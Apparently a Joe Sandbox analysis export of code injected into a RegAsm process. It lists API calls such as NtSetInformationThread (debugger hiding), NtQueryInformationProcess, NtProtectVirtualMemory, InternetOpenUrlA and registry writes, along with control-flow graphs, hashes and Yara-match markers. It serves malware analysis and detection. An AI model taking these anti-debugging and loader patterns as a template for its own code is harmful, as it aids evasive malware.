                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: cb8104912665ef0133ece89a500bfd49e73c1bea20618522217c05156157e0d2
                                  • Instruction ID: 023fc180cb9d414c7f497662cf52a9f59def010dbef91e55b097315632a76d31
                                  • Opcode Fuzzy Hash: cb8104912665ef0133ece89a500bfd49e73c1bea20618522217c05156157e0d2
                                  • Instruction Fuzzy Hash: 8F310070614701AFFB28AE68CD59BE8B3A2AF057A4F544258FD519B1D2D7B1D880CA11
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
control_flow_graph 1689 c39f12-c3a709 call c38fc5 1694 c3a709 1689->1694 1695 c3062c-c30ae6 call c381cf * 2 call c345aa call c3949d call c34c36 call c381cf NtSetInformationThread call c381cf 1689->1695 1694->1695 1697 c3a70f-c3a715 1694->1697 1729 c30aeb-c30b00 1695->1729 1698 c3a71a-c3a721 1697->1698 1698->1698 1700 c3a723-c3a736 1698->1700 1702 c3a73b-c3a743 1700->1702 1702->1702 1704 c3a745-c3a769 1702->1704 1709 c3a7f4-c3a803 1704->1709 1710 c3a76f-c3a779 1704->1710 1710->1709 1712 c3a77b-c3a77f 1710->1712 1712->1709 1714 c3a781-c3a787 1712->1714 1714->1709 1716 c3a789-c3a78d 1714->1716 1716->1709 1718 c3a78f-c3a793 1716->1718 1718->1709 1720 c3a795-c3a799 1718->1720 1720->1709 1722 c3a79b-c3a7ab 1720->1722 1722->1695 1725 c3a7b1-c3a7bf 1722->1725 1725->1709 1726 c3a7c1-c3a7c9 1725->1726 1726->1709 1728 c3a7cb-c3a7d6 1726->1728 1728->1709 1730 c3a7d8-c3a7dd NtQueryInformationProcess 1728->1730 1731 c30b06-c30b2c call c38314 1729->1731 1732 c33189-c331e1 call c33e58 1729->1732 1735 c3a7e0-c3a7e8 1730->1735 1731->1729 1739 c30b2e-c30b85 call c35811 call c34109 call c3519a call c381cf call c39eee 1731->1739 1740 c331e6-c335ed 1732->1740 1741 c331e1 call c33e58 1732->1741 1735->1735 1738 c3a7ea-c3a825 1735->1738 1748 c3a827 1738->1748 1749 c3a7cf-c3a7d6 1738->1749 1774 c30b8b-c30bf3 call c381cf call c39eee 1739->1774 1775 c31078-c310d8 call c381cf * 2 call c39eee 1739->1775 1745 c335f3-c33620 call c39eee 1740->1745 1746 c3452b-c34534 1740->1746 1741->1740 1759 c33df6-c33e51 call c39eee * 4 1745->1759 1760 c33626-c33726 call c33fdf call c37d70 call c39eee 1745->1760 1750 c34535-c3454c 1746->1750 1748->1748 1749->1709 1749->1730 1750->1750 1753 c3454e-c345a2 1750->1753 1760->1759 1786 c3372c-c33767 call c39eee 1760->1786 1774->1775 1793 c30bf9-c30c05 1774->1793 1807 c38a84-c38f11 call c38799 call c38ab5 1775->1807 1808 c310de-c310e8 call c37ce8 1775->1808 1786->1759 1795 c3376d-c337cc call c39eee 1786->1795 1796 c30c0b-c30c2a call c382c4 1793->1796 1795->1759 1804 c337d2-c337d7 1795->1804 1805 c30c51-c30c56 1796->1805 1806 c30c2c-c30c35 1796->1806 1804->1759 1810 c337dd-c33825 call c337f9 1804->1810 1805->1807 1813 c30c5c-c31053 1805->1813 1806->1807 1811 c30c3b-c30c40 1806->1811 1822 c3110b-c31111 1808->1822 1823 c310ea 1808->1823 1833 c33827-c3382c 1810->1833 1834 c33834-c33840 1810->1834 1811->1807 1816 c30c46-c30c4b 1811->1816 1813->1807 1819 c31059-c3105e 1813->1819 1816->1805 1816->1807 1819->1807 1825 c31064-c31069 1819->1825 1828 c31117-c31143 call c31864 call c37d70 call c317bf 1822->1828 1829 c311af-c311b9 1822->1829 1824 c310f4-c310fe call c33189 1823->1824 1846 c31100-c31104 1824->1846 1825->1807 1831 c3106f-c31072 1825->1831 1828->1695 1867 c31149-c3114d 1828->1867 1829->1695 1835 c311bf-c311c4 1829->1835 1831->1775 1831->1796 1833->1759 1839 c33832 1833->1839 1834->1759 1840 c33841-c3388e call c38314 1834->1840 1841 c311c6-c311ca 1835->1841 1842 c311de-c311eb 1835->1842 1839->1834 1840->1759 1860 c33894-c33919 call c3452b call c338d6 1840->1860 1843 c311d9 call c31d3f 1841->1843 1844 c311cc-c311d7 call c31864 1841->1844 1847 c35a43-c35a52 call c311f0 1842->1847 1848 c340a3-c34108 call c39eee 1842->1848 1843->1842 1844->1842 1844->1843 1846->1848 1863 c35a56 1847->1863 1864 c35abf-c35ac6 call c352b9 1847->1864 1860->1759 1891 c3391f-c33957 call c39eee 1860->1891 1868 c35a58-c35a7f 1863->1868 1869 c35abd-c35abe 1863->1869 1876 c35b31-c35f1a 1864->1876 1877 c35ac8-c35ae3 1864->1877 1867->1829 1873 c3114f-c311ae call c3949d call c31719 call c31dbc 1867->1873 1879 c35a82-c35aac 1868->1879 1880 c35ae7-c35aee 1868->1880 1869->1864 1873->1829 1883 c35ae4 1877->1883 1879->1883 1892 c35aae-c35ac6 call c35200 1879->1892 1885 c35af0-c35b1e 1880->1885 1886 c35b1f-c35b2c 1880->1886 1883->1880 1885->1886 1886->1876 1891->1759 1899 c3395d-c33d99 call c39eee 1891->1899 1892->1876 1892->1877 1899->1759 1904 c33d9b-c33dd3 call c39eee * 2 1899->1904
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3A7D8
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Information$ProcessQueryThread
                                  • String ID:
                                  • API String ID: 142225228-0
                                  • Opcode ID: 00133cc32faff595a26c4de06b7b911790b2ec6a7b4a7baf7a59f1db3d213b15
                                  • Instruction ID: fd95da02b5d06ab83e162b6509c9c5f69399b2f027fe3ca99920311dce34e86c
                                  • Opcode Fuzzy Hash: 00133cc32faff595a26c4de06b7b911790b2ec6a7b4a7baf7a59f1db3d213b15
                                  • Instruction Fuzzy Hash: A0B10993E2E5146F66A08D2DE4D13AEA2E257A5310BF8D1188E619F78DF36CFD4243C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  • control_flow_graph (rendered graph widget; edge list not reproduced). Entry block: c3a30d-c3a709. Blocks calling APIs: c3062c-c30ae6 NtSetInformationThread; c3a7d8-c3a7dd NtQueryInformationProcess.
                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00C30AC8
                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3A7D8
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Information$ProcessQueryThread
                                  • String ID:
                                  • API String ID: 142225228-0
                                  • Opcode ID: be58969baf69663eeee644a64fb9ef284b25a6643e8ecf1cff3a39de77eeaf43
                                  • Instruction ID: 6573cc18fa21c6a683cdb32346d6c2a35e8309c1736688324ee92b409c612590
                                  • Opcode Fuzzy Hash: be58969baf69663eeee644a64fb9ef284b25a6643e8ecf1cff3a39de77eeaf43
                                  • Instruction Fuzzy Hash: 50B1FA93E1E5146F66A48D2DE4D13AEA2E257A13107F8D1188E619F78DF36CFD4243C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3A7D8
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID:
                                  • API String ID: 1778838933-0
                                  • Opcode ID: 79751bbd70b7e6565d9dd082c8a01e4ceabf00169ce343474bf4350be8c7e97c
                                  • Instruction ID: ee2e6f07f7eda139197c809ad2e5c008748412c27df5220ee56f31581a8be4fc
                                  • Opcode Fuzzy Hash: 79751bbd70b7e6565d9dd082c8a01e4ceabf00169ce343474bf4350be8c7e97c
                                  • Instruction Fuzzy Hash: D9D012352143024E6B1DEE24C1D65693776AED6354B588008CA5106418F2236EAAC762
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00C39515,00000040,00C30A94,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C39B65
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  • control_flow_graph (rendered graph widget; edge list not reproduced). Entry block: c352b9-c352d3 InternetOpenA. Other block calling an API: c35310-c35336 InternetOpenUrlA.
                                  APIs
                                  • InternetOpenA.WININET(00C35AC4,00000000,00000000,00000000,00000000,00C3124E,00000000,00000000,00000000,00000000,0000006D,0000020C,?,00C35A48,00000000,000000FF), ref: 00C352C9
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,00000004,00000000,?,00000000), ref: 00C3532E
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID:
                                  • API String ID: 2038078732-0
                                  • Opcode ID: bc5163e42e9add266c6683ac9f16a41edb28294c7a844079115d7c557696cb88
                                  • Instruction ID: 9a00d104b1d98ae9b1dd0a681319cc467719d854ea630400ffd9a73297a2936b
                                  • Opcode Fuzzy Hash: bc5163e42e9add266c6683ac9f16a41edb28294c7a844079115d7c557696cb88
                                  • Instruction Fuzzy Hash: DB31933065438AEFEF35CE64CD55FEE3666EF04740F508429FD4A9A190D7729A84EB10
                                  Uniqueness

                                  Uniqueness Score: 4.01%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  • control_flow_graph (rendered graph widget; edge list not reproduced). Entry block: c317ce-c368cd RegCreateKeyExA (with subcalls c31844, c31820).
                                  APIs
                                  • RegCreateKeyExA.KERNEL32(80000001,00C368D8,00000000,00000000,00000000,000F003F,00000000,?,?,00C31137,?,?,00000000,00000000,000000FF,00000007), ref: 00C317FE
                                    • Part of subcall function 00C31820: RegSetValueExA.KERNELBASE(?,00C368C2,00000000,00000001,?,?,?,?,?,?,00C31137,?,?,00000000,00000000,000000FF), ref: 00C31831
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateValue
                                  • String ID:
                                  • API String ID: 2259555733-0
                                  • Opcode ID: 502ffc77333b3ead3e48a26d063047435d608c0ded7f583f21f06490bcde5c1c
                                  • Instruction ID: c3e627e9c410bcc4084109a7ccb9e0cce948da5780c9e5133b0c036d691500b6
                                  • Opcode Fuzzy Hash: 502ffc77333b3ead3e48a26d063047435d608c0ded7f583f21f06490bcde5c1c
                                  • Instruction Fuzzy Hash: 67C16CD3D2E5543FA2918D29E8A63AEE6E117613007B8D2498E515F79EF36CFD0243C1
                                  Uniqueness

                                  Uniqueness Score: 0.14%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  • control_flow_graph (rendered graph widget; edge list not reproduced). Entry block: c32b50-c32f82 TerminateThread.
                                  APIs
                                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 00C32F78
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 6670c59fd34363fb74b30b30c27a4bf1a5391331b13fca0eaddc9fd4ae2d1e1f
                                  • Instruction ID: 588ba526f6859e4ed735627b89a88120e583cf20e1c4f6089979a1b07c4b1a50
                                  • Opcode Fuzzy Hash: 6670c59fd34363fb74b30b30c27a4bf1a5391331b13fca0eaddc9fd4ae2d1e1f
                                  • Instruction Fuzzy Hash: 32913393E5E5183F66A04C2DF8A67AEA2E243907007F4D2049F126F78DF3ACBC4206C0
                                  Uniqueness

                                  Uniqueness Score: 1.31%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  • control_flow_graph (rendered graph widget; edge list not reproduced). Entry block: 1d89b9ba-1d89b9c5. Block calling an API: 1d89ba5d-1d89ba65 GetFileSecurityW.
                                  APIs
                                  • GetFileSecurityW.KERNELBASE(?,?,0A1AC197,00000000), ref: 1D89BA63
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileSecurity
                                  • String ID:
                                  • API String ID: 200422441-0
                                  • Opcode ID: c3acb4a7f354ee0913d4f5ead1e638dd457baf0b9e38a5c5d6c9eb8a0e4f69e1
                                  • Instruction ID: 67c85427a4533333c214f7b5b865c419ad403c0a9db2b18fee58ffeff83d7365
                                  • Opcode Fuzzy Hash: c3acb4a7f354ee0913d4f5ead1e638dd457baf0b9e38a5c5d6c9eb8a0e4f69e1
                                  • Instruction Fuzzy Hash: 7D31506150E3C05FD7038B749CA5652BFB49F57214B0E84DBD8C4CF1A3D229A849C772
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1D89A731
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 071a1eada05b80ffb9704ece2c92b82c5db646fed447b7d43f40c1be61f34b0e
                                  • Instruction ID: be895e503007d706e839ca12ced3191e14ab0128cf90d7164d45974f4b3e65d0
                                  • Opcode Fuzzy Hash: 071a1eada05b80ffb9704ece2c92b82c5db646fed447b7d43f40c1be61f34b0e
                                  • Instruction Fuzzy Hash: 1731C1B11093806FE7128B648C85FA7FFBCEF46210F08849BF985DB193D224A909C772
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 75225bba369b5256672b6e8c27de006746047b5c26f70e36a30c11dd7c9d6c16
                                  • Instruction ID: 5281e66024f92f62c96b394af057b714089515eb0eb46c3312374725c9423987
                                  • Opcode Fuzzy Hash: 75225bba369b5256672b6e8c27de006746047b5c26f70e36a30c11dd7c9d6c16
                                  • Instruction Fuzzy Hash: F9213BB47143179ADB24AE68C4E07FB27A2EF56750FA4412CFC9687106DB75CC4B8641
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,0A1AC197,00000000,00000000,00000000,00000000), ref: 1D89A834
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: c6d1e2b3ea1fbc7c4d3faa696deaea708056cbd98923ff2b83d089a4e89c3520
                                  • Instruction ID: 3099faa79538f4cfd127a62d259e4eec24abf1a4cf9550a3ffaa3c334c6d479f
                                  • Opcode Fuzzy Hash: c6d1e2b3ea1fbc7c4d3faa696deaea708056cbd98923ff2b83d089a4e89c3520
                                  • Instruction Fuzzy Hash: 6D31A1755053846FE722CF21CC84FA3FFA8EF46610F08849AE985DB153D264E549CB61
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 1D89BB51
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: b6e17f06fa179f3d38a7408c5f56e06b98ac442780c2806bd503504f8fb99076
                                  • Instruction ID: be144f5fbb854a74b0c1d83ad40b5a1d1f4a841bccf3d8fff6efce6f4203da4a
                                  • Opcode Fuzzy Hash: b6e17f06fa179f3d38a7408c5f56e06b98ac442780c2806bd503504f8fb99076
                                  • Instruction Fuzzy Hash: A63180B5505384AFE712CB25CC85F66FBE8EF45610F05849AE984CB292D365E908CB71
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1D89A926
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 4196d41a5541e2fa42bd61294e580b5a4e4dc3513a76e6cf2a50f8379eacf318
                                  • Instruction ID: 1d2388fe6706f6490216890c424f15c47bca7bca4e999bb26d2e7356c282d4fa
                                  • Opcode Fuzzy Hash: 4196d41a5541e2fa42bd61294e580b5a4e4dc3513a76e6cf2a50f8379eacf318
                                  • Instruction Fuzzy Hash: A321C8755093C06FD3138B258C51B62BFB8EF87A10F0981CFE9848B693D265A919C7B2
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 00C32F78
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 7793c82ec79c2428207682b383148305938dfb2e6feb53ae70cce6dc9d2de6ad
                                  • Instruction ID: 7a450f0de8de004e057a76931e51ba8bbbedb2714abcd1ed67f3fe06b3565cb5
                                  • Opcode Fuzzy Hash: 7793c82ec79c2428207682b383148305938dfb2e6feb53ae70cce6dc9d2de6ad
                                  • Instruction Fuzzy Hash: 221134B0750301AFEB205E688D8AFED3365EF05360FE00262FD129B1D2D760DCC28A26
                                  Uniqueness

                                  Uniqueness Score: 1.31%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1D89A731
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: e30145906b97d9321a09fca028b0bc85016f3db82bda875bd45f80ed62434b10
                                  • Instruction ID: 36229ea16bbfc98e69579a5f9afe793b58915a5c2e7c09d9c5927cf4fe0d29ca
                                  • Opcode Fuzzy Hash: e30145906b97d9321a09fca028b0bc85016f3db82bda875bd45f80ed62434b10
                                  • Instruction Fuzzy Hash: EB21CFB2500704BFEB21DF55DC85FABF7ECEF84610F04845AF985DB251D624E6088AB2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EB4), ref: 1D89B397
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: ad90aea2e24f00dae85f055ca1a79b7b44f94d5f58aade24af76c28d89a4cd12
                                  • Instruction ID: ff5f32502c714b9173267842314f4f05949fe44f68441cc7eaf18fec23c2a3b1
                                  • Opcode Fuzzy Hash: ad90aea2e24f00dae85f055ca1a79b7b44f94d5f58aade24af76c28d89a4cd12
                                  • Instruction Fuzzy Hash: 9F21D7755493C46FE712CB11CC85BA2FFA8DF42720F0880DAE9849F193D268A949C7B2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • CreateMutexW.KERNEL32(?,?), ref: 1D89BB51
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 3d0253444f2febc85da9e2dbe4a6fc593a46fa802122d0b41ff8614687e5d32e
                                  • Instruction ID: b7a7d282a3df28fa8360faef4d99480de95147feeae214c109444f2b78aa2704
                                  • Opcode Fuzzy Hash: 3d0253444f2febc85da9e2dbe4a6fc593a46fa802122d0b41ff8614687e5d32e
                                  • Instruction Fuzzy Hash: D421CFB1600244AFE711DF25CC85B66FBE8EF44620F05846AED88CB285D371F904CB72
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,0A1AC197,00000000,00000000,00000000,00000000), ref: 1D89A834
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: 8ef8596e1fd591ecc9d2e54991add54899be2776da775874bdd2368db75353f4
                                  • Instruction ID: 2a5e988c4e90b66f524f109efda8ecf410a6085b616a0d1557eb935fed166675
                                  • Opcode Fuzzy Hash: 8ef8596e1fd591ecc9d2e54991add54899be2776da775874bdd2368db75353f4
                                  • Instruction Fuzzy Hash: 4A218E75600244AFEB20CF56CC84FA7F7ECEF84610F04845AE989DB252D760E549CAB2
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,00000EB4), ref: 1D89B397
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 7fc326ea7c004fb3960906221553e8443fd7015c0571ca0a2458255df1b51a52
                                  • Instruction ID: 40de7d47f2d5a645223774c8c75515e1c0bbfa34ef168ddb347b79944592d644
                                  • Opcode Fuzzy Hash: 7fc326ea7c004fb3960906221553e8443fd7015c0571ca0a2458255df1b51a52
                                  • Instruction Fuzzy Hash: F811E575600244AFF721DB15DCC5BA6FB98DF84B20F14C059ED889B281D6B5BA48CAA2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • GetFileSecurityW.KERNELBASE(?,?,0A1AC197,00000000), ref: 1D89BA63
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: FileSecurity
                                  • String ID:
                                  • API String ID: 200422441-0
                                  • Opcode ID: 7fccff05780e4d0235fdc41725f35f657c7316918af786c595ca0bd1f005a720
                                  • Instruction ID: 10554a08d36f28fdb05a27ed357d45171423fbdee6816e5ee199f75773a0d48d
                                  • Opcode Fuzzy Hash: 7fccff05780e4d0235fdc41725f35f657c7316918af786c595ca0bd1f005a720
                                  • Instruction Fuzzy Hash: F91161716012859FDB14CF19DCC5756FBD8EF44620F08C4AAEC48CB242E675E904CB62
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • SetErrorMode.KERNEL32(?,0A1AC197,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1D89A308
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: c7bf5a076db82aae94eb3a089e3b691e9db5b7ef5607a1f7947bc749250b942c
                                  • Instruction ID: 6341dcb615835425254423e48a11e5a0d534d9f0be7f987ab609c8a5d7f27e64
                                  • Opcode Fuzzy Hash: c7bf5a076db82aae94eb3a089e3b691e9db5b7ef5607a1f7947bc749250b942c
                                  • Instruction Fuzzy Hash: F601C4755093C49FC7118F15DC84B52FFB4DF46620F0980DAED898F263D275A908CB62
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1D89A926
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24281047274.000000001D89A000.00000040.00000001.sdmp, Offset: 1D89A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_1d89a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: db6b2513dd80209eb9f0455248215f2aca38814ee4dc6150c63aba0f26684cc9
                                  • Instruction ID: 9b3825c6f27771b0084d30a901e98d476a54ae8b1d53b22afb012c246d8393a8
                                  • Opcode Fuzzy Hash: db6b2513dd80209eb9f0455248215f2aca38814ee4dc6150c63aba0f26684cc9
                                  • Instruction Fuzzy Hash: 61016275A40204ABD350DF16DC46B26FBF8FB89B20F14815AED085B781D371F925CAE5
                                  Uniqueness

                                  Uniqueness Score: 0.02%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,B769339E,?,00C30A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00C304BD,00000000), ref: 00C3822B
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_c30000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
